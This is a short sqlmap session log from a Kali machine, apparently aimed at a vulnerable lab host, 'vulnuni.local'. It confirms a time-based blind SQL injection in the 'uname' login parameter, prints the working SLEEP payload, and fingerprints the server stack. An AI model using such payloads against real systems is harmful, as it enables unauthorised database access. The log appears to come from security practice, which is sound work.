        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.10#stable}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 09:50:37 /2026-02-20/

[09:50:37] [INFO] parsing HTTP request from '/home/kali/Desktop/login_request.txt'
[09:50:37] [INFO] resuming back-end DBMS 'mysql' 
[09:50:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test' AND (SELECT 2927 FROM (SELECT(SLEEP(5)))lyCd)-- Atif&pass=test&submit=Enter
---
[09:50:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 12.04 or 12.10 or 13.04 (Quantal Quetzal or Raring Ringtail or Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[09:50:38] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/vulnuni.local'

[*] ending @ 09:50:38 /2026-02-20/

